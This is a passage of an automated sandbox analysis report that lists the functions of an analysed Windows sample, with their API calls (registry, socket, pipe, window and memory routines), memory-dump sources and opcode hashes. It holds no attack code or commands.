                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00947868
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0094786B
                                                                    • SysAllocString.OLEAUT32 ref: 0094788C
                                                                    • SysFreeString.OLEAUT32 ref: 00947895
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 009478AF
                                                                    • SysAllocString.OLEAUT32(?), ref: 009478BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: c948ea008731ac6649e6a9f7848e3b238876c265551688a5db375af20ae16e36
                                                                    • Instruction ID: 89e0f5dd3ad16cb584b5d7d43b807a3678449392ecc50f09806a2da169662aa4
                                                                    • Opcode Fuzzy Hash: c948ea008731ac6649e6a9f7848e3b238876c265551688a5db375af20ae16e36
                                                                    • Instruction Fuzzy Hash: D5213E76608208AF9B109BE8DC88DAAB7ACEB097607108525BA15DB2A1D774DC81DB64
                                                                    Function 009504D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 009504F2
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0095052E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandlePipe
                                                                    • String ID: nul
                                                                    • API String ID: 1424370930-2873401336
                                                                    • Opcode ID: bd41876a8b9b6cefaa9f8649cbb79ad8b822d21efe4fa9ac714fa5a8b42aef55
                                                                    • Instruction ID: fa546b65b27ca7f59ec072c28b610b64ad5dc8cd98f058e25c0fe293b777f1c5
                                                                    • Opcode Fuzzy Hash: bd41876a8b9b6cefaa9f8649cbb79ad8b822d21efe4fa9ac714fa5a8b42aef55
                                                                    • Instruction Fuzzy Hash: 85217E71500305EBDB20CF2BD804A9A77A8BF84725F204A19FCA1E62E0E770D949DF20
                                                                    Function 009505A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 009505C6
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00950601
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandlePipe
                                                                    • String ID: nul
                                                                    • API String ID: 1424370930-2873401336
                                                                    • Opcode ID: 35ec3bb95645f632c079d1e2b8e4a63de46fe2fe9c28559a8ee9bf3bf35dbe13
                                                                    • Instruction ID: 12fc06fd3aa649fd2e1b97493e6bc3199f18af0d9f9ab64dc5746a697c5bc928
                                                                    • Opcode Fuzzy Hash: 35ec3bb95645f632c079d1e2b8e4a63de46fe2fe9c28559a8ee9bf3bf35dbe13
                                                                    • Instruction Fuzzy Hash: 92217F75501306DBDB20DF6ADC04A9A77A8AFD5721F240B19FCA1E72E0E77099A4CB10
                                                                    Function 009740AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008E604C
                                                                      • Part of subcall function 008E600E: GetStockObject.GDI32(00000011), ref: 008E6060
                                                                      • Part of subcall function 008E600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 008E606A
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00974112
                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0097411F
                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0097412A
                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00974139
                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00974145
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                    • String ID: Msctls_Progress32
                                                                    • API String ID: 1025951953-3636473452
                                                                    • Opcode ID: 9ac833eb63b6e0dc05b55429b8b3c04c0d11acd3abbe8fd50bfb438e39095aef
                                                                    • Instruction ID: 02d5693dd89e56fadc5c5c715c428b7bd036dbeb72ceff6d6c288b99f9d65e89
                                                                    • Opcode Fuzzy Hash: 9ac833eb63b6e0dc05b55429b8b3c04c0d11acd3abbe8fd50bfb438e39095aef
                                                                    • Instruction Fuzzy Hash: 1511B2B2150219BEEF119F64CC86EE77F9DEF19798F108110BA18A2050C7729C61DBA4
                                                                    Function 0091D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0091D7A3: _free.LIBCMT ref: 0091D7CC
                                                                    • _free.LIBCMT ref: 0091D82D
                                                                      • Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
                                                                      • Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0
                                                                    • _free.LIBCMT ref: 0091D838
                                                                    • _free.LIBCMT ref: 0091D843
                                                                    • _free.LIBCMT ref: 0091D897
                                                                    • _free.LIBCMT ref: 0091D8A2
                                                                    • _free.LIBCMT ref: 0091D8AD
                                                                    • _free.LIBCMT ref: 0091D8B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                    • Instruction ID: ab4facfb0111765fd200093cf298ee1fe1f7371c4c785adedc0ab37f9f34c76f
                                                                    • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                    • Instruction Fuzzy Hash: 841151B1742B0CAAE521BFB0CC47FCB7BDC6F80710F440825B2A9AA0D2DAA5B5A54650
                                                                    Function 0094DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0094DA74
                                                                    • LoadStringW.USER32(00000000), ref: 0094DA7B
                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0094DA91
                                                                    • LoadStringW.USER32(00000000), ref: 0094DA98
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0094DADC
                                                                    Strings
                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 0094DAB9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message
                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                    • API String ID: 4072794657-3128320259
                                                                    • Opcode ID: 2dfdd13105642c6ab940b2c679991d2dc8a4448d30d91366b726b05ab2dc033d
                                                                    • Instruction ID: c536526b27fdda80524e64e7d168f72ad4419362845e3e0eb669d888de55c4f9
                                                                    • Opcode Fuzzy Hash: 2dfdd13105642c6ab940b2c679991d2dc8a4448d30d91366b726b05ab2dc033d
                                                                    • Instruction Fuzzy Hash: A70186F75142087FE711ABA09D89EEB376CE708705F4048A9B74AE2041EA749EC44F74
                                                                    Function 0095096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(00BAE2C8,00BAE2C8), ref: 0095097B
                                                                    • EnterCriticalSection.KERNEL32(00BAE2A8,00000000), ref: 0095098D
                                                                    • TerminateThread.KERNEL32(00BAE2C0,000001F6), ref: 0095099B
                                                                    • WaitForSingleObject.KERNEL32(00BAE2C0,000003E8), ref: 009509A9
                                                                    • CloseHandle.KERNEL32(00BAE2C0), ref: 009509B8
                                                                    • InterlockedExchange.KERNEL32(00BAE2C8,000001F6), ref: 009509C8
                                                                    • LeaveCriticalSection.KERNEL32(00BAE2A8), ref: 009509CF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 3495660284-0
                                                                    • Opcode ID: af03f5f9ae3eb02609cb377bd125aeb69a1baa3a9915cbe70de8f771b97dd08f
                                                                    • Instruction ID: 457a86b412d4248907f54e1a0d6081fe34ecf15e42338ca1c14c8f169d320dbd
                                                                    • Opcode Fuzzy Hash: af03f5f9ae3eb02609cb377bd125aeb69a1baa3a9915cbe70de8f771b97dd08f
                                                                    • Instruction Fuzzy Hash: BFF03C7345AA02FBD7415FA4EE8CBD6BB39FF41702F402029F206A08A5CB7494A5DF90
                                                                    Function 008E5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 008E5D30
                                                                    • GetWindowRect.USER32(?,?), ref: 008E5D71
                                                                    • ScreenToClient.USER32(?,?), ref: 008E5D99
                                                                    • GetClientRect.USER32(?,?), ref: 008E5ED7
                                                                    • GetWindowRect.USER32(?,?), ref: 008E5EF8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$Client$Window$Screen
                                                                    • String ID:
                                                                    • API String ID: 1296646539-0
                                                                    • Opcode ID: 26ee2146a9a4553fe30a1eadb9ad83756bd8b1e0735f318e5b137b436b583d31
                                                                    • Instruction ID: 87cb0efa76381a6e25c202ae2bc368f161c0389fdae34a9de208ed244c22318b
                                                                    • Opcode Fuzzy Hash: 26ee2146a9a4553fe30a1eadb9ad83756bd8b1e0735f318e5b137b436b583d31
                                                                    • Instruction Fuzzy Hash: 51B18A79A1078ADBDB10CFA9C4807EEB7F1FF48314F14841AE8A9D7254DB30AA51DB50
                                                                    Function 009101B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __allrem.LIBCMT ref: 009100BA
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009100D6
                                                                    • __allrem.LIBCMT ref: 009100ED
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0091010B
                                                                    • __allrem.LIBCMT ref: 00910122
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00910140
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 1992179935-0
                                                                    • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                    • Instruction ID: 7c64150170cccd4ed4189de3fe5c62580a5aa068b7a78526f9a2fdffcef3e5bf
                                                                    • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                    • Instruction Fuzzy Hash: 57811772B0070AAFE7209E28CC51BAB73E9EFC5360F24453AF551D66C1E7B5DA808750
                                                                    Function 00961D10 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00963149: select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00963195
                                                                    • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00961DC0
                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00961DE1
                                                                    • WSAGetLastError.WSOCK32 ref: 00961DF2
                                                                    • inet_ntoa.WSOCK32(?), ref: 00961E8C
                                                                    • htons.WSOCK32(?), ref: 00961EDB
                                                                    • _strlen.LIBCMT ref: 00961F35
                                                                      • Part of subcall function 009439E8: _strlen.LIBCMT ref: 009439F2
                                                                      • Part of subcall function 008E6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,008FCF58,?,?,?), ref: 008E6DBA
                                                                      • Part of subcall function 008E6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,008FCF58,?,?,?), ref: 008E6DED
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                    • String ID:
                                                                    • API String ID: 1923757996-0
                                                                    • Opcode ID: 3a3e451691c22a7ed4dbdd8459ce36f9fd2261ddafaa7459c63a3299fd025ca7
                                                                    • Instruction ID: 1345c9e1f11e3d1d2567840eac34472984cf60414d3d9d5f9c32a995597fa259
                                                                    • Opcode Fuzzy Hash: 3a3e451691c22a7ed4dbdd8459ce36f9fd2261ddafaa7459c63a3299fd025ca7
                                                                    • Instruction Fuzzy Hash: CAA1DE31604340AFC324DB24C891F2A7BA9FF85318F58895CF5569B2A2DB71ED46CB92
                                                                    Function 009161FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009082D9,009082D9,?,?,?,0091644F,00000001,00000001,8BE85006), ref: 00916258
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0091644F,00000001,00000001,8BE85006,?,?,?), ref: 009162DE
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009163D8
                                                                    • __freea.LIBCMT ref: 009163E5
                                                                      • Part of subcall function 00913820: RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852
                                                                    • __freea.LIBCMT ref: 009163EE
                                                                    • __freea.LIBCMT ref: 00916413
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1414292761-0
                                                                    • Opcode ID: 21b2fe8a54bdfe79b421b38279008c98e063344080a9064e24f89fb486ea9de8
                                                                    • Instruction ID: d59937cd8795820d17efb63a7bd95e011a757d72e88c5ab40d8c6abb95f21a8b
                                                                    • Opcode Fuzzy Hash: 21b2fe8a54bdfe79b421b38279008c98e063344080a9064e24f89fb486ea9de8
                                                                    • Instruction Fuzzy Hash: CC51D072B0021AABDB258F64CD81FEF77AAEB84710F144629FC25D6180EB34DCC1D660
                                                                    Function 0096BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                      • Part of subcall function 0096C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096B6AE,?,?), ref: 0096C9B5
                                                                      • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096C9F1
                                                                      • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA68
                                                                      • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA9E
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096BCCA
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0096BD25
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0096BD6A
                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0096BD99
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0096BDF3
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0096BDFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                    • String ID:
                                                                    • API String ID: 1120388591-0
                                                                    • Opcode ID: f5e85af5a4d23d228b27aefb885c4c77192f151cef3849771099a4a598d49c43
                                                                    • Instruction ID: eb385b119c77282dc5fd08a1f3564f189b4dbd7737631328b1810175ab06d253
                                                                    • Opcode Fuzzy Hash: f5e85af5a4d23d228b27aefb885c4c77192f151cef3849771099a4a598d49c43
                                                                    • Instruction Fuzzy Hash: 2C81C571108241EFC714DF24C895E2ABBE9FF85308F14895CF5998B2A2DB31ED85CB92
                                                                    Function 0093F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(00000035), ref: 0093F7B9
                                                                    • SysAllocString.OLEAUT32(00000001), ref: 0093F860
                                                                    • VariantCopy.OLEAUT32(0093FA64,00000000), ref: 0093F889
                                                                    • VariantClear.OLEAUT32(0093FA64), ref: 0093F8AD
                                                                    • VariantCopy.OLEAUT32(0093FA64,00000000), ref: 0093F8B1
                                                                    • VariantClear.OLEAUT32(?), ref: 0093F8BB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                    • String ID:
                                                                    • API String ID: 3859894641-0
                                                                    • Opcode ID: f6bec7bbde4cf054dc0293fa8504911f45d7b3d669a1356e5f9e0d6a92a803d0
                                                                    • Instruction ID: f77f793b7949d5ce79ea7c1bed083cf8a6ef8e93697ccec1d2727dea721222a3
                                                                    • Opcode Fuzzy Hash: f6bec7bbde4cf054dc0293fa8504911f45d7b3d669a1356e5f9e0d6a92a803d0
                                                                    • Instruction Fuzzy Hash: D551B735D10314BBCF24AB65D8A5B29B3A9EF45310F245866F906DF292DB748C40CF57
                                                                    Function 0095910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E7620: _wcslen.LIBCMT ref: 008E7625
                                                                      • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 009594E5
                                                                    • _wcslen.LIBCMT ref: 00959506
                                                                    • _wcslen.LIBCMT ref: 0095952D
                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00959585
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
